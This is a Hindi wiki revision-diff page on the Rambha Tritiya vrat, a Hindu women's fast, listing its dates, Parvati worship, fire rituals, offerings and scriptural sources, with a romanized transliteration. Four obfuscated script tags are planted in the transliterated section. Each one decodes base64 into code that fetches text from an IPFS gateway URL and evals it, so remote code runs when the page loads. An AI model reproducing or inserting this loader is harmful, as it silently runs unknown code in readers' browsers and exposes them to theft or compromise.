Difference between revisions of "रम्भा तृतीया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(7 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[ज्येष्ठ]] [[शुक्ल पक्ष]] की [[तृतीया]] पर रम्भातृतीया व्रत किया जाता है।
 
*[[ज्येष्ठ]] [[शुक्ल पक्ष]] की [[तृतीया]] पर रम्भातृतीया व्रत किया जाता है।
 
*रम्भातृतीया [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की तृतीया तिथि पर किया जाता है।
 
*रम्भातृतीया [[मार्गशीर्ष]] [[शुक्ल पक्ष]] की तृतीया तिथि पर किया जाता है।
 
*रम्भातृतीया को [[पार्वती]] पूजा; एक वर्ष तक करनी चाहिए।
 
*रम्भातृतीया को [[पार्वती]] पूजा; एक वर्ष तक करनी चाहिए।
 
*विभिन्न नामों से देवी पूजा जैसे- मार्गशीर्ष में पार्वती, [[पौष]] में [[गिरिजा]] आदि नामों से पूजा होती है।
 
*विभिन्न नामों से देवी पूजा जैसे- मार्गशीर्ष में पार्वती, [[पौष]] में [[गिरिजा]] आदि नामों से पूजा होती है।
*रम्भातृतीया विभिन्न दान तथा विभिन्न [[पदार्थ|पदार्थों]] का सेवन किया जाता है।<ref>हेमाद्रि व्रत खण्ड 1, पृ0 430-435, भविष्योत्तरपुराण 24|1-36 से उद्धरण); [[गरुड़ पुराण]] (1|120)</ref>
+
*रम्भातृतीया विभिन्न दान तथा विभिन्न [[पदार्थ|पदार्थों]] का सेवन किया जाता है।<ref>हेमाद्रि व्रत खण्ड 1, पृ0 430-435, भविष्योत्तरपुराण 24|1-36 से उद्धरण); [[गरुड़ पुराण]] (1|120</ref>
 
*यदि तृतीया, [[द्वितीया]] एवं [[चतुर्थी]] से युक्त हो तो यह व्रत द्वितीया से युक्त तृतीया पर किया जाना चाहिए।<ref>कालनिर्णय 174</ref>  
 
*यदि तृतीया, [[द्वितीया]] एवं [[चतुर्थी]] से युक्त हो तो यह व्रत द्वितीया से युक्त तृतीया पर किया जाना चाहिए।<ref>कालनिर्णय 174</ref>  
*पूर्वाभिमुख होकर पाँच [[अग्नि देव|अग्नियों]]<ref>(जैसे- गार्हपत्य, दाक्षिणाग्नि, सम्य एवं आहवनीय तथा ऊपर [[सूर्य देव|सूर्य]])</ref> के बीच में बैठना चाहिए।
+
*पूर्वाभिमुख होकर पाँच [[अग्नि देव|अग्नियों]]<ref>जैसे- गार्हपत्य, दाक्षिणाग्नि, सम्य एवं आहवनीय तथा ऊपर [[सूर्य देव|सूर्य]]</ref> के बीच में बैठना चाहिए।
 
*[[ब्रह्मा]] एवं [[महाकाली]], [[महालक्ष्मी देवी]], [[महामाया]] तथा [[सरस्वती]] के रूप में देवी की ओर मुख करना चाहिए।
 
*[[ब्रह्मा]] एवं [[महाकाली]], [[महालक्ष्मी देवी]], [[महामाया]] तथा [[सरस्वती]] के रूप में देवी की ओर मुख करना चाहिए।
 
*[[ब्राह्मण|ब्राह्मणों]] के द्वारा सभी दिशाओं में होम करना चाहिए।
 
*[[ब्राह्मण|ब्राह्मणों]] के द्वारा सभी दिशाओं में होम करना चाहिए।
 
*देवी पूजा तथा देवी के समक्ष सौभाग्याष्टक नामक आठ [[द्रव्य|द्रव्यों]] को रखना चाहिए।
 
*देवी पूजा तथा देवी के समक्ष सौभाग्याष्टक नामक आठ [[द्रव्य|द्रव्यों]] को रखना चाहिए।
 
*सायंकाल सुन्दर घर के लिए स्तुति के साथ [[रुद्राणी]] को सम्बोधित करना चाहिए।
 
*सायंकाल सुन्दर घर के लिए स्तुति के साथ [[रुद्राणी]] को सम्बोधित करना चाहिए।
*इस के उपरान्त कर्ता (स्त्री या पुरुष) किसी ब्राह्मण को उसकी पत्नी के साथ सम्मान देता है और सूप में नैवेद्य रखकर सधवा नारियों को समर्पित करता है।<ref>हेमाद्रि (व्रत खण्ड 1, 426-430, भविष्योत्तरपुराण 18|1-36 से उद्धरण) कालनिर्णय (176), तिथितत्व (30-31)</ref>
+
*इस के उपरान्त कर्ता (स्त्री या पुरुष) किसी ब्राह्मण को उसकी पत्नी के साथ सम्मान देता है और सूप में नैवेद्य रखकर सधवा नारियों को समर्पित करता है।<ref>हेमाद्रि (व्रत खण्ड 1, 426-430, भविष्योत्तरपुराण 18|1-36 से उद्धरण) कालनिर्णय (176), तिथितत्त्व (30-31</ref>
 
*रम्भातृतीया व्रत विशेषत: नारियों के लिए है।
 
*रम्भातृतीया व्रत विशेषत: नारियों के लिए है।
 
*रम्भातृतीया को यह नाम इसलिए मिला है कि [[रम्भा]] ने इसे सौभाग्य के लिए किया था।
 
*रम्भातृतीया को यह नाम इसलिए मिला है कि [[रम्भा]] ने इसे सौभाग्य के लिए किया था।
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 22: Line 23:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:58, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • jyeshth shukl paksh ki tritiya par rambhatritiya vrat kiya jata hai.
  • rambhatritiya margashirsh shukl paksh ki tritiya tithi par kiya jata hai.
  • rambhatritiya ko parvati pooja; ek varsh tak karani chahie.
  • vibhinn namoan se devi pooja jaise- margashirsh mean parvati, paush mean girija adi namoan se pooja hoti hai.
  • rambhatritiya vibhinn dan tatha vibhinn padarthoan ka sevan kiya jata hai.[1]
  • yadi tritiya, dvitiya evan chaturthi se yukt ho to yah vrat dvitiya se yukt tritiya par kiya jana chahie.[2]
  • poorvabhimukh hokar paanch agniyoan[3] ke bich mean baithana chahie.
  • brahma evan mahakali, mahalakshmi devi, mahamaya tatha sarasvati ke roop mean devi ki or mukh karana chahie.
  • brahmanoan ke dvara sabhi dishaoan mean hom karana chahie.
  • devi pooja tatha devi ke samaksh saubhagyashtak namak ath dravyoan ko rakhana chahie.
  • sayankal sundar ghar ke lie stuti ke sath rudrani ko sambodhit karana chahie.
  • is ke uparant karta (stri ya purush) kisi brahman ko usaki patni ke sath samman deta hai aur soop mean naivedy rakhakar sadhava nariyoan ko samarpit karata hai.[4]
  • rambhatritiya vrat visheshat: nariyoan ke lie hai.
  • rambhatritiya ko yah nam isalie mila hai ki rambha ne ise saubhagy ke lie kiya tha.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri vrat khand 1, pri0 430-435, bhavishyottarapuran 24|1-36 se uddharan); garu d puran (1|120
  2. kalanirnay 174
  3. jaise- garhapaty, dakshinagni, samy evan ahavaniy tatha oopar soory
  4. hemadri (vrat khand 1, 426-430, bhavishyottarapuran 18|1-36 se uddharan) kalanirnay (176), tithitattv (30-31

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>